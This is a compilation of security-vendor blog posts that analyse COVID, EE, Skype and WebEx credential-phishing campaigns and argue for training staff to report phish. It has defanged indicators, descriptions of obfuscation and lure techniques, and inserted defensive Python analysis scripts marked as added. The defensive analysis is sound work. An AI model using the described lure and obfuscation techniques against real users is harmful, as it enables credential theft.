Staff Members’ Inbox Positive for Coronavirus Themed Phish

By Ashley Tran, Cofense Phishing Defense Center

From prime ministers, members of congress to celebrities and staff of nursing homes — many have been affected by COVID-19. And the worst part? Threat actors know this and are heavily weaponizing this pandemic, exploiting the fears and concerns of users everywhere. The Cofense Phishing Defense Center (PDC) has observed a new phishing campaign found in environments protected by Microsoft and Symantec that not only impersonates a company’s management but also suggests that a fellow employee has tested positive for the disease, urging users to read an enclosed malicious attachment posed as “guidelines” or “next steps.”

As we have seen before and noted in previous Cofense blogs and media stories, Coronavirus themed phishing attacks are running rampant and attacking users across all industries. Although the attacks vary in method, the main takeaway is the same: all users must exercise the utmost caution and restraint in the face of emotionally jarring emails.

Figures 1-3: Email Bodies

The PDC has found multiple instances of this attack and a trend among them all. As demonstrated in Figures 1-3, the email subject lines are relatively similar: “Staff Member Confirmed COVID 19 Positive ID,” followed by a random string of numbers and that day’s date. The emotion these subject lines evoke in users is also the same: fear and curiosity. Emails appearing to be a “Team Update on COVID 19” and bearing their company’s name can convince end users to believe the email was sent internally. However, the true senders are revealed via the return paths:

Maga[@]tus[.]tusdns[.]com and ungrez[@]ssd7[@]linuxpl[.]com

Admittedly these emails would appear suspicious to most, but the threat actor is relying on the emotional subject line to overcome logic and push users to read just the first line of the sender information and nothing more.

The bodies of the emails have more variety and are worded differently, but they share the same main point: a fellow employee has the virus, so read this guideline we’ve attached to get more details or at least learn the “next steps” to take. To top it off, the email is signed by “Management.”

The real substance of this attack lies within the HTML file attached to the email.

Figure 4 shows that the attachment has been detected as malicious by a multitude of services; however, users won’t see this when they read the email.

Figure 4: VirusTotal Analysis

Figure 5: Phishing Page

Upon opening the attachment, users are presented with a generic Microsoft login page, a frequently targeted brand. The difference with this phish, however, is that the threat actor has superimposed the login box over a blurred document that may appear to users as the previously mentioned “guidelines,” lending an even greater sense of legitimacy.

The email of the recipient is automatically appended to the username field via code in the HTML. In fact, the threat actor has painstakingly embedded the base64 encoding of each recipient’s email address, which is decoded back to readable form when the user interacts with the phish. This snippet of code can be observed in Figure 6.

Figure 6: Email Bodies

Once a user navigates to the next page and inputs their password, the information is then sent to the compromised site:

hxxp://tokai-lm[.]jp/style/89887cc/5789n[.]php?98709087-87634423

This exchange of information can be viewed by opening developer tools on any browser and navigating to the networking tab as shown in Figure 7.

Figure 7: Phishing Page

The code found within the HTML file that hosts the phishing content employs typical malicious tactics. For example, as seen in Figure 8, the code does not look like typical HTML. This is because the threat actor has attempted to obfuscate the code to make analysis, as well as detection, harder. However, this is nothing new for phishing campaigns that choose to utilize an HTML file. De-obfuscating the code and revealing some of its methods is not difficult.

Figure 8: Obfuscated Code

To begin, the code is notably broken into different parts. Each of these parts may stand out to anyone with an eye for encoding as being hex text and base64. Both can easily be decoded back into their original form, the true HTML code, by utilizing tools such as RapidTables and Base64 Decode.
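As an added example, not code from the original post or from Cofense, here is a small Python script that performs the same peeling of hex/percent-escaped and base64 layers an analyst would otherwise do by hand in RapidTables or Base64 Decode, then lists the URLs the recovered page references. The sample attachment, the placeholder hostnames (cdn.example.net, img.example.org, collector.example.com) and the helper names are all constructed for this illustration.

```python
"""Peel the hex/percent-escape and base64 layers off an obfuscated HTML
attachment and list the URLs the recovered page talks to.
Added example (not the PDC's tooling); the sample attachment below is
constructed here, with placeholder hosts in place of the real ones."""
import base64
import re
from urllib.parse import unquote

# Constructed stand-in for the de-obfuscated page: an external style sheet,
# a background image, and the form that posts the captured credentials.
INNER_HTML = (
    '<html><head>'
    '<link rel="stylesheet" href="https://cdn.example.net/vendor/styles.css">'
    '</head><body style="background:url(https://img.example.org/doc.png)">'
    '<form method="POST" action="https://collector.example.com/post.php?id=1">'
    '<input name="user"><input type="password" name="pass"></form>'
    '</body></html>'
)


def build_sample():
    """Wrap INNER_HTML the way the write-up describes: a base64 layer fed to
    atob(), itself hidden inside a percent-escaped document.write()."""
    inner_b64 = base64.b64encode(INNER_HTML.encode()).decode()
    layer = 'document.write(atob("%s"));' % inner_b64
    escaped = "".join("%%%02X" % b for b in layer.encode())
    return '<script>document.write(unescape("%s"));</script>' % escaped


HEX_RUN = re.compile(r"(?:%[0-9A-Fa-f]{2}){8,}")       # %3C%68%74...
JS_ESC_RUN = re.compile(r"(?:\\x[0-9A-Fa-f]{2}){8,}")  # \x3c\x68\x74...
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")      # long base64 blobs


def _maybe_b64(match):
    """Replace a base64 run with its text if it decodes to readable text;
    otherwise leave it alone (it may be a legitimate token or an image)."""
    try:
        text = base64.b64decode(match.group(0), validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return match.group(0)
    if all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return text
    return match.group(0)


def decode_layers(blob, max_depth=10):
    """Strip encoding layers until the text stops changing.  The depth cap
    keeps a hostile sample from making the analyst's script spin forever."""
    for _ in range(max_depth):
        new = HEX_RUN.sub(lambda m: unquote(m.group(0)), blob)
        new = JS_ESC_RUN.sub(
            lambda m: bytes.fromhex(m.group(0).replace("\\x", "")).decode("latin-1"),
            new)
        new = B64_RUN.sub(_maybe_b64, new)
        if new == blob:
            break
        blob = new
    return blob


URL_RE = re.compile(r"""https?://[^\s"'<>()]+""")


def extract_urls(html):
    """Unique URLs referenced by the page, sorted for stable reporting."""
    return sorted(set(URL_RE.findall(html)))


def defang(url):
    """Render a URL in the hxxp / [.] notation used in the write-up so it
    cannot be clicked by accident in a report."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


if __name__ == "__main__":
    recovered = decode_layers(build_sample())
    for u in extract_urls(recovered):
        print(defang(u))
```

Running the script prints the recovered style sheet, background image and form-action URLs in defanged form. The depth cap matters in practice: some kits nest layers that decode to very large blobs or to further encoded text, and an unbounded loop is an easy way to hang an analysis script.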

Figure 9: De-obfuscated Code

After de-obfuscating the code, the true HTML is seen in Figure 9. It reveals that the threat actor has compromised, or at the very least made use of, a compromised site to host the style sheet for their phish:

hxxp://ibuykenya[.]com/vendor/doctrine/styles[.]css

Figure 10: Open Directory with Phish Resource Files

Figure 10 shows the directory in which the threat actor stored the style sheet for the phish, along with two additional files that appear, based on their last-modified dates, to belong to the same campaign.

Within the code, the image seen in the background of the document can also be recovered. The image is hosted on ImgBB, yet another relatively benign image hosting site to which threat actors flock to host images for their attacks.

hxxps://i[.]ibb[.]co/dMcjCWC/image[.]png

Figure 11: Document Preview from Phish

Upon closer observation, the title of the document can be obtained. With a quick search, the image the threat actor has used to further legitimize this login page in the eyes of the user can be linked back to the legitimate document found in Figure 12.

Figure 12: Legitimate Document Utilized by Threat Actor

All these steps – the social engineering, the obfuscated code, the use of official COVID health advisories and more – are designed to ensure users don’t detect that a phishing attack is in progress. This phish also demonstrates the attacker’s need to employ layered techniques designed to avoid detection by email gateways, as well as the incident responder’s need for the right investigative tools to properly analyze, detect and quarantine this threat.

Network IOC
hxxp://tokai-lm[.]jp/style/89887cc/5789n[.]php?98709087-87634423

IP
150[.]60[.]156[.]116

How Cofense Can Help

Visit Cofense’s Coronavirus Phishing Infocenter to stay up to date as threats evolve. Our site is updated with screenshots and YARA rules as we continue to track campaigns.

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

Targeted Attack Uses Fake EE Email to Deceive Users

By Kian Mahdavi and Tej Tulachan, Cofense Phishing Defense Center

The Cofense Phishing Defense Center (PDC) has discovered a spear-phishing campaign designed to defraud corporate executives of their payment details by spoofing EE, a well-known UK-based telecommunications and internet service provider. These spear phishing messages were reported to the Cofense PDC by end users whose email environments are protected by Microsoft 365 EOP and Symantec. This new, targeted campaign shows that while exploiting well-known telecommunications brands is nothing new, such phishing emails continue to go undetected by popular email gateways designed to protect end users, leading to possible theft of prized corporate credentials.

Figure 1: Email Body

Threat actors sent a targeted email to a few executives, including one at a leading financial firm, with the subject line reading ‘View Bill – Error’ from a purchased domain (moniquemoll[.]nl). These details in and of themselves may raise red flags for eagle-eyed recipients, as EE’s trademarked name isn’t included in any part of the full email address.

The malicious URL inserted within the text is:

hXXps://fly-guyz[.]com/ee[.]co[.]uk[.]edcnymdsqmnydqnyo

The vague email indicates ‘we’re working to get this fixed’. At no point does the email give an indication what this error is. As we read on, the second hyperlink states ‘view billing to make sure your account details are correct’ to entice the recipient to click the phishing link.

The threat actor fails to include the correct registered office address, evident towards the bottom of the email. Once the threat actor’s social engineering does the trick and the user clicks one of the links, they are redirected to a phishing page.

Noted in Figure 2 below is the trusted HTTPS protocol (also displayed as the green padlock) in the URL. This gives the user false reassurance: the padlock only shows that traffic between the browser and the website is encrypted against eavesdropping, not that the site itself is legitimate.

The threat actor even went to the trouble of obtaining SSL certificates for the domain to further gain end users’ trust. In fact, it has become much easier for site owners, including fraudsters, to obtain these certificates.

Figures 2 and 3: First and second phishing pages

The peculiar aspect is the message the threat actor included, ‘You will not be charged’, to reassure recipients and trick them into providing their payment information. The user is then automatically redirected to the legitimate EE website, as displayed below in Figure 4, to avoid suspicion. This is a common tactic to make the user believe the session timed out or their password was mistyped.

Figure 4: Legitimate Redirect Login Page

At the time of writing, the phishing page is still live and active. To further validate the analysis of the investigation, we decided to input some fake credentials, allowing us to verify the transmitted TCP requests and redirects to the fraudster’s domain at hXXps://kbimperial[.]com/data[.]php.

Figure 5: TCP Retransmission Packets

Indicators of Compromise:

Network IOC
hXXps://fly-guyz[.]com/ee[.]co[.]uk[.]edcnymdsqmnydqnyo/
hXXps://kbimperial[.]com/ee[.]co[.]uk[.]edcnymdsqmnydqnyo/logins
hXXps://kbimperial[.]com/data[.]php?

IP
104[.]31[.]82[.]7
104[.]31[.]83[.]7
35[.]208[.]71[.]62


This Phish Uses Skype to Target Surging Remote Workers

By Harsh Patel

The Cofense Phishing Defense Center (PDC) recently unearthed a new phishing campaign spoofing Skype, the popular video calling platform that has seen a recent spike in use amid the need to keep employees connected as they work remotely. This phishing attack was found in email environments protected by Proofpoint and Microsoft 365 EOP, landing in end-users’ inboxes.

With so many people working from home, remote work software like Skype, Slack, Zoom, and WebEx are starting to become popular themes of phishing lures. We recently uncovered an interesting Skype phishing email that an end user reported to the PDC.

Figures 1 and 2: Email Body

For this attack, the threat actor created an email that looks eerily similar to a legitimate pending notification coming from Skype. The threat actor tries to spoof a convincing Skype phone number and email address in the form of 67519-81987[@]skype.[REDACTED EMAIL]. While the sender address may appear legitimate at first glance, the real sender can be found in the return-path displayed as “sent from,” which also happens to be an external compromised account. Although there are many ways to exploit a compromised account, for this phishing campaign the threat actor chose to use it to send out even more phishing campaigns masquerading as a trusted colleague or friend.
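Both this post and the staff-member phish above make the same observation: the real sender shows up in the Return-Path rather than in the From line the user sees. As an added example (not code from the original post or from Cofense), the following Python snippet parses a constructed message in that shape and flags the disagreement; ORG_DOMAIN, the sample headers and the function names are assumptions made for the illustration.

```python
"""Compare the visible From: sender with the Return-Path the mail was
actually bounced through.  Added example, not PDC tooling; the message
below is constructed and ORG_DOMAIN is an assumed value."""
import email
from email import policy
from email.utils import parseaddr

ORG_DOMAIN = "example-corp.com"   # the receiving organisation (assumption)

# Constructed message in the shape the write-ups describe: an internal-
# looking display name and From address, a subject built from the
# "Staff Member Confirmed COVID 19 Positive ID" pattern, and a Return-Path
# on an unrelated host.
SAMPLE_MESSAGE = """\
Return-Path: <bounce@mailer.example.net>
From: "Team Update on COVID 19" <management@example-corp.com>
Reply-To: management@example-corp.com
To: staff@example-corp.com
Subject: Staff Member Confirmed COVID 19 Positive ID: 61205 04/08/2020
Content-Type: text/plain

Please read the attached guidelines and next steps.
Management
"""


def _domain(msg, header):
    """Lower-cased domain part of the first address in a header ('' if none)."""
    addr = parseaddr(str(msg.get(header, "")))[1]
    return addr.rpartition("@")[2].lower()


def analyze_headers(raw):
    """Return the sender domains plus two flags: whether Return-Path and
    From disagree, and whether From claims to be ORG_DOMAIN while the
    bounce address lives elsewhere (the pattern in the campaigns above)."""
    msg = email.message_from_string(raw, policy=policy.default)
    from_dom = _domain(msg, "From")
    rp_dom = _domain(msg, "Return-Path")
    reply_dom = _domain(msg, "Reply-To")
    mismatch = bool(rp_dom) and rp_dom != from_dom
    spoofed_internal = from_dom == ORG_DOMAIN and rp_dom not in ("", ORG_DOMAIN)
    return {
        "from_domain": from_dom,
        "return_path_domain": rp_dom,
        "reply_to_domain": reply_dom,
        "mismatch": mismatch,
        "spoofed_internal": spoofed_internal,
    }


if __name__ == "__main__":
    for key, value in analyze_headers(SAMPLE_MESSAGE).items():
        print(f"{key}: {value}")
```

A Return-Path that differs from From is common for legitimate bulk senders, so on its own it is a weak signal. The stronger one is the combination checked in spoofed_internal: a From address that claims your own domain while the bounce address lives elsewhere, which should also fail DMARC alignment if your domain publishes a policy.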

It is not uncommon to receive emails about pending notifications for various services. The threat actor anticipates users will recognize this as just that, so they take action to view the notifications. Curiosity and the sense of urgency entice many users to click the “Review” button without recognizing the obvious signs of a phishing attack.

Upon clicking ‘Review’ users will be redirected via an app.link:

hxxps://jhqvy[.]app[.]link/VAMhgP3Mi5

Finally, to the end phishing page:

hxxps://skype-online0345[.]web[.]app

The threat actor has chosen to utilize a .app top-level domain to host their attack. This TLD is backed by Google to help app developers securely share their apps. A benefit of this top-level domain is that it requires HTTPS to connect to it, adding security on both the user’s and developer’s end, which is great…but not in this case. The inclusion of HTTPS means the addition of a lock to the address bar, which most users have been trained to trust. Because this phishing site is being hosted via Google’s .app TLD it displays this trusted icon.

Figure 3: Phishing Page

Clicking the link in the email, the user is shown an impersonation of the Skype login page. If a well-trained user inspects the URL, they will see that the URL contains the word Skype (hxxps://skype-online0345[.]web[.]app). To add an even greater sense of authenticity, the threat actor adds the recipient’s company logo to the login box as well as a disclaimer at the bottom warning that this page is for “authorized use” by that company’s users only. The username is auto-filled because the URL contains the base64 of the target email address, adding simplicity to the phishing page and leaving little room for doubt. The only thing left for the user to do is to enter his or her password, which then falls into the hands of the threat actor.
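Both this page and the staff-member phish above pre-fill the username with the victim’s address carried as base64, in the URL here and inside the attached HTML there. As an added example (not the original post’s code or Cofense’s), the Python below scans a URL or HTML fragment for base64 tokens that decode to an e-mail address; the sample URL, the sample HTML and the placeholder address victim@example-corp.com are constructed for the illustration.

```python
"""Spot a recipient's address hidden as base64 in a phishing URL or in the
HTML that pre-fills the username box.  Added example (not PDC tooling);
the URL and HTML samples are constructed here."""
import base64
import re
from urllib.parse import unquote

EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")
# base64 in either the standard or the URL-safe alphabet, long enough to
# hold a short address (12 chars = 9 bytes)
B64_TOKEN = re.compile(r"[A-Za-z0-9+/_-]{12,}={0,2}")

# Constructed target address used to build the samples (placeholder)
TARGET = b"victim@example-corp.com"
SAMPLE_URL = "https://login.example-phish.test/#" + base64.b64encode(TARGET).decode()
SAMPLE_URL_UNPADDED = ("https://x.example/?u="
                       + base64.urlsafe_b64encode(TARGET).decode().rstrip("="))
SAMPLE_HTML = (
    '<input id="user" name="username" value="">'
    '<script>document.getElementById("user").value = atob("%s");</script>'
    % base64.b64encode(TARGET).decode()
)


def decode_if_email(token):
    """Return the decoded address if `token` is base64 for an e-mail address,
    else None.  Missing '=' padding is restored first, since it is often
    stripped from URLs."""
    padded = token + "=" * (-len(token) % 4)
    try:
        # urlsafe_b64decode accepts both alphabets ('-'/'_' map to '+'/'/')
        text = base64.urlsafe_b64decode(padded).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if EMAIL_RE.match(text) else None


def find_encoded_emails(text):
    """All distinct addresses recoverable from base64 tokens in a URL or
    HTML fragment.  Percent-encoding is removed first so %3D padding is seen."""
    found = []
    for token in B64_TOKEN.findall(unquote(text)):
        addr = decode_if_email(token)
        if addr and addr not in found:
            found.append(addr)
    return found


if __name__ == "__main__":
    for sample in (SAMPLE_URL, SAMPLE_URL_UNPADDED, SAMPLE_HTML):
        print(find_encoded_emails(sample))
```

The check is cheap enough to run over proxy logs or over URLs extracted from reported mail, and a hit is a strong indicator: legitimate login pages rarely carry the user’s own address base64-encoded in the fragment, query or path.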

 

Network IOCs
hxxps://jhqvy[.]app[.]link/VAMhgP3Mi5
hxxps://skype-online0345[.]web[.]app

New Phishing Campaign Spoofs WebEx to Target Remote Workers

By Ashley Tran, Cofense Phishing Defense Center

The Cofense Phishing Defense Center (PDC) has observed a new phishing campaign that aims to harvest Cisco WebEx credentials via a security warning for the application, which Cisco’s own Secure Email Gateway fails to catch. In the midst of the COVID-19 pandemic, millions of people are working from home using a multitude of online platforms and software. Attackers, of course, know this and are exploiting trusted brands like WebEx to deliver malicious emails to users.

Targeting users of teleconferencing brands is nothing new. But with most organizations adhering to guidelines that non-essential workers stay home, the rapid influx of remote workers is prime picking for attackers trying to spoof brands like WebEx. We anticipate there will continue to be an increase in remote work phishing in the months to come.

Here’s how this campaign works:

Figure 1: Email Body

For this attack, the threat actor sends an email with varying subject lines such as “Critical Update” or “Alert!” from the spoofed address “meetings[@]webex[.]com”. The subject and mail content combined may pique users’ curiosity enough to entice them to click in order to take the requested action.

The email then explains there is a vulnerability the user must patch or risk allowing an unauthenticated user to install a “Docker container with high privileges on the system.” In this scenario, the threat actor has spoofed a legitimate business service and explained a problem with their software, prompting even non-technical readers to read further. The threat actor even links to a legitimate write-up for the vulnerability, found at the URL embedded in the text ‘CVE-2016-9223’:

hxxps://cve[.]mitre[.]org/cgi-bin/cvename.cgi?name=CVE-2016-9223

The linked article uses the same words as the email, lending further credibility.

The only thing for a responsible user to do next is follow the instructions in the email and update their Desktop App, right?

Even if more cautious users hover over the ‘Join’ button before clicking, they could still very well believe it’s legitimate. The URL embedded behind it is:

hxxps://globalpagee-prod-webex[.]com/signin

While the legitimate Cisco WebEx URL is:

hxxps://globalpage-prod[.]webex[.]com/signin

At a first glance, both URLs look eerily similar. A closer look, however, reveals an extra ‘e’ is added to ‘globalpage.’ Likewise, instead of ‘prod.webex’, the malicious link is ‘prod-webex’.
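The three lookalike forms on this page, an extra letter plus a hyphen in place of a dot (globalpagee-prod-webex[.]com), the brand pushed into a subdomain of an unrelated host (skype-online0345[.]web[.]app) and the brand placed in the path of an unrelated host (fly-guyz[.]com/ee[.]co[.]uk...), can all be caught by one check. As an added example (not code from the original post or from Cofense), the Python below compares a URL’s registrable domain against a small allowlist of brand domains and reports why the URL looks suspicious; the allowlist, the cut-down suffix table, the similarity threshold and the hostname webxe[.]com used to show a typo-squat are assumptions made for the illustration.

```python
"""Flag look-alike hosts of the kind seen in this write-up.  Added example,
not PDC tooling; the allowlist and suffix table are assumptions."""
from difflib import SequenceMatcher
from urllib.parse import urlsplit

# Registrable domains the organisation trusts, and the keyword users
# associate with each (assumed allowlist; extend for your environment)
KNOWN_BRANDS = {
    "webex.com": "webex",
    "skype.com": "skype",
    "ee.co.uk": "ee",
}
# Tiny stand-in for the Public Suffix List (assumption; use the full list
# in production so that e.g. co.uk is treated as a suffix)
MULTI_LABEL_SUFFIXES = {"co.uk", "org.uk", "com.au"}
TYPO_THRESHOLD = 0.8   # similarity above which a domain is called a typo-squat


def registrable_domain(host):
    """Owner-controlled part of a hostname: last two labels, or three when
    the last two are a known multi-label suffix."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in MULTI_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def assess_url(url):
    """Classify a URL as known-brand, suspicious (with reasons) or carrying
    no brand signal at all."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    reg = registrable_domain(host)
    result = {"host": host, "registrable": reg, "verdict": "known-brand", "reasons": []}
    if reg in KNOWN_BRANDS:
        return result

    # Split host and path on the separators attackers swap around ('-' for '.')
    host_tokens = set(host.replace("-", ".").split("."))
    path = parts.path.lower()
    path_tokens = set(path.replace("-", ".").replace("/", ".").split("."))
    reasons = []
    for brand_dom, keyword in KNOWN_BRANDS.items():
        if keyword in host_tokens:
            reasons.append(f"brand keyword '{keyword}' appears inside non-brand host {host}")
        if brand_dom in path or keyword in path_tokens:
            reasons.append(f"brand '{brand_dom}' appears in the path rather than the host")
        ratio = SequenceMatcher(None, reg, brand_dom).ratio()
        if ratio >= TYPO_THRESHOLD:
            reasons.append(f"{reg} is {ratio:.2f} similar to {brand_dom} (possible typo-squat)")
    result["reasons"] = reasons
    result["verdict"] = "suspicious" if reasons else "no-brand-signal"
    return result


if __name__ == "__main__":
    for u in ("https://globalpage-prod.webex.com/signin",
              "https://globalpagee-prod-webex.com/signin",
              "https://skype-online0345.web.app",
              "https://fly-guyz.com/ee.co.uk.edcnymdsqmnydqnyo",
              "https://webxe.com/login"):
        r = assess_url(u)
        print(r["verdict"], u, *r["reasons"], sep="\n  ")
```

The similarity test catches single-character typo-squats (webxe.com scores 0.89 against webex.com), while the token test catches the hyphen-for-dot trick on this page, where similarity alone scores only 0.51 because the attacker’s host is much longer than the brand domain.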

To carry out this attack, the threat actor registered a fraudulent domain through Public Domain Registry just days before sending out the credential phishing email.

The attacker has even gone as far as obtaining an SSL certificate for their fraudulent domain to gain further trust from end users. While the official Cisco certificate is verified by HydrantID, the attacker’s certificate is through Sectigo Limited. Regardless of who verified the attacker’s certificate, the result is the same – a lock to the left of the URL that renders the page legitimate in the eyes of many users.

Figure 2:  Initial Phishing Page

The phishing page to which users are redirected is identical to the legitimate Cisco WebEx login page; visually there is no difference. Behavior-wise, there is a deviation between the real site and the fraudulent page. When email addresses are typed into the real Cisco page, the entries are checked to verify whether there are associated accounts. With this phishing page, however, any email-formatted entry takes the recipient to the next page, where they are then asked to enter their password.

Figure 3: Secondary Phishing Page

Once credentials are provided, users are redirected to the official Cisco website to download WebEx, which may be enough to convince most users it is a legitimate login process to update their WebEx app.

Figure 4: Legitimate Redirect Page – Official Cisco WebEx Download Page

At the time of writing, this fraudulent domain is still live and active. In fact, when navigating to the main domain, there is an open directory showing files the threat actor has utilized with this attack.

Figure 5: Open Directory

Files of interest include ‘sign-in%3fsurl=https%[…]’ and ‘out.php’.

The file ‘sign-in%3fsurl=https%[…]’ is the phishing page itself. When users click from this directory, they are redirected to the fraudulent WebEx login (Figure 3).

Figure 6: ‘out.php’ File

The ‘out.php’ file, seen in Figure 6, is the mailer the threat actor appears to have used to send this attack to users’ inboxes. The threat actor can manually input any subject they want – in this case, they chose “Critical Update!!”, adding the HTML for the email to the box below and designating an email list to which they wish to mass send this campaign.

With many organizations quickly adopting remote working policies, threat actors are poised to continue to spoof brands that facilitate virtual collaboration and communication, such as teleconferencing tools and cloud solutions.

Indicators of Compromise:

Network IOC
hxxps://globalpagee-prod-webex[.]com/signin

IP
192[.]185[.]214[.]109

How Cofense Can Help

Visit Cofense’s Coronavirus Phishing Infocenter to stay up to date as threats evolve. Our site is updated with screenshots and YARA rules as we continue to track campaigns.

Every day, the Cofense Phishing Defense Center (PDC) analyzes phishing emails that bypassed email gateways, 75% of which are credential phish.

Easily consume phishing-specific threat intelligence to proactively defend your organization against evolving threats with Cofense Intelligence. Cofense Intelligence customers received further information about this threat in Active Threat Report (ATR) 37308 and received YARA rule PM_Intel_CredPhish_37308. For Cofense Intelligence customers who would like to keep up with the Active Threat Reports and indicators being published, all COVID-19 campaigns are tagged with the “Pandemic” search tag.

The Value of Human Intelligence in Phishing Defense

By Guest Blogger, Frank Dickson, Program Vice President, Cybersecurity Products, IDC

The value of humans, our fellow employees, in phishing defense has been a hotly contested topic for quite some time. Advocates say that end users play a role, be it innocent and unintended, in just about every phishing campaign, and that proper behavior modification can ultimately solve the problem. Detractors need only point to the consistent “clickiness” of end users to question that value. Yet the reality is that responsibility lies somewhere in the middle.

The detractors are indeed correct. Users do continue to click on malicious links and participate in other unintended ways. Training helps a lot, improving a user’s ability to spot malicious email. Even though the human eye improves, cyber miscreants are clever, and even the best of us get tricked on an off day. However, what the detractors fail to acknowledge is that for a user to click on a link in a phishing email, the email first had to get past our messaging defenses—our organization’s security technology.

The Additive Factor

Here lies the crux of the argument: People are not perfect; but neither is technology. When you look at phishing, that pretty well sums up the problem. There’s so much complexity associated with IT architectures that, as of right now, the existing technology is:

A) clearly not getting it done, and
B) just too immensely complex to let any single technology fully cover it.

Malicious emails are getting through. Luckily though, technology defenses and human intelligence are not mutually exclusive. They are additive; both can be used together and, in fact, complement each other.

The factor that makes human intelligence so compelling is the way it’s applied. As we layer technologies atop other technologies, we often wonder whether we are indeed increasing our efficacy, or whether less technology would stop the same malicious emails. Human intelligence, by contrast, is applied only to emails that have already gotten past our messaging security technologies. By default, then, human intelligence can only identify new threats.

Case in point: even if you do a great job taking out spam and malware, you still have malicious messages that get through. In the case of a compromised business email account, someone can grab credentials and take control of it. An email can appear to come from the CEO with a fictitious invoice sent to accounting saying, “Please pay this invoice.” The invoice gets paid—without the use of malware or a malicious link, right?

The email comes from a legitimate email box. Everything is “legitimate,” it’s just someone compromised the credentials. Dealing with that kind of use case is incredibly difficult. The long story short here is the complexity. Technology is great for dealing with standardized problems. When the complexity increases exponentially, however, human intelligence stands a better chance at inferring malicious intent.

Additionally, humans can scale, each applying a unique intelligence. If a malicious email gets past our technology defenses and into 10 inboxes, it only takes one of those 10 people to say, “Hmm, this doesn’t look right,” and report it. Essentially, security intelligence is crowdsourced.

The Feedback Imperative

Keep in mind, however, that human intelligence is neither free nor easy. It takes a commitment to make it work. Training users on what to look for is a good start. Users need background in terms of what’s in a malicious email, what does legitimate email look like, and what are the warning signs. You must give them the rudimentary training. That’s step one. Step two requires simulations, providing pop quizzes, for example, of obvious scenarios.

Training and simulations are great, but those by themselves are not the key. The key is the feedback loop. End users want to contribute. They want to be part of the solution. Sometimes IT thinks, “Ah, those silly end users. Easier not to keep them involved.”

But users want to know they are valued. They don’t want to feel like their time’s being wasted. If no one gets back to them and tells them that, hey, their feedback is important, then the user reasonably thinks, “I’m just wasting my time.” In addition to refining an end-user’s ability to detect malicious email, feedback from IT says, “Yes, your input was both considered and important.”

And that is the most effective security you can have.

By Tonia Dudley

The advent of the modern-day shopping mall was in the mid-1950s, and it continued to rise in popularity as the go-to place for shopping in the decades thereafter. Watching the hit series Stranger Things is a great reminder of the mall experience, but how times have changed with the introduction and boom of the internet. Retailers shifted their approach to stay relevant in the online era by standing up websites to accompany their brick & mortar locations.

Today we see retail outlets that exist solely in the web sphere – without any type of building. They are prime targets not only for consumer fraud but also cyber-attacks on retail data and reputations. The online marketplace excels in delivering goods quickly to the “I need to have it now” buyer. Threat actors excel too. They are masters at leveraging this urgency, as well as today’s delivery methods, to lure shoppers into scams.

And consumers aren’t the only targets. Attackers go after employees at retail organizations with phishing emails designed to steal customer data and create a PR nightmare. When this happens, consumers naturally think twice about buying again.

83% of consumers are concerned about purchasing from a company that was previously breached.

60% of POS compromises started with a phishing attack.

Source: 2019 Generali Global Assistance Cyber & Digital Protection Survey

What does this all mean when it comes to the phishing threat landscape? Consumers generally require a username and password to place an order on most websites. Based on threat intelligence from our research teams here at Cofense™, we know that threat actors primarily craft emails designed to steal credentials, both from consumers to gain access to online accounts and from retail employees to gain a foothold in an organization and compromise further. This is why it is critical for retail organizations to ensure their support staff have been trained to identify and report phishing attempts to gain access to their credentials.

29% of all breaches involve stolen credentials.

Source: 2019 Verizon Data Breach Investigations Report

Cofense partnered with the Retail ISAC this past summer to conduct a benchmark study. Participants ranged from small to large organizations. It is clear that organizations with an easy reporting method – a button within the mail client – are more resilient against phishing threats.

Figure 1: Susceptibility and resiliency rates for manual reporting vs. email button-based reporting, average

Figure 2: Susceptibility and resiliency rates for reporting by user group size

Retail organizations are no different than other industries – to effectively defend against phishing attacks, they need visibility of attacks that have bypassed existing controls. It takes more than a Secure Email Gateway and phishing Computer Based Training to enable Security Teams to respond quickly and reduce the risk of compromise or data breach. Cofense is uniquely positioned to help retail organizations unite to fight phishing through our comprehensive phishing defense portfolio.

To learn more about retail phishing attacks and how Cofense can help, view our new infographic.

Quit Faking It—Train Your Users to Stop Real Phish

By Tonia Dudley

Cofense™ was the pioneer of phishing simulation as a training method to defend against phishing incidents. We’ve evolved our products and methodology as we understand that real phish are the real problem. What has also evolved over time is the depth of our scenario templates—when threat actors shift to use a new tactic to make their way past the secure email gateway (SEG), Cofense is able to quickly offer a scenario based on that tactic.

When we say, “Real phish are the real problem” we mean organizations should set their phishing defense strategy from end to end. This starts with how we provide simulation training, teaching users how to identify phish and react, and then how Security Operations teams mitigate the potential incident. Training against real phish, the ones your organization actually faces, is essential.

Let’s look at the data to tell the story. It comes from our recently published Annual Phishing Report 2019. Looking at the data in Figure 1, which relates specifically to “real phish,” we can see that organizations using templates based on real phishing emails (active threats) have far better results. Not only is the report rate higher, but the susceptibility rate is also lower, ultimately improving the overall resiliency rate.

Figure 1

When an organization has been running their program for a few years, they begin to wonder how much is enough and whether they should keep sending scenarios. We point to the phishing emails reported by our customers in our Cofense Phishing Defense Center™ (PDC). More than 90% of emails reported came from environments that use a SEG. While the SEG is absolutely necessary to protect an organization, like any other defense it’s not infallible against threat actors who continually adjust their tactics to make their way into the inbox. This is why it’s vital to align your training scenarios to what gets past your SEG.

Taking another view, we see what happens with two common templates available for simulation campaigns. The first one is made to look similar to a social media message users might receive if they associate their work email with this site. You can see the click rate is fairly low. Are the threat actors really spending that much time making a phishing email look this fancy?

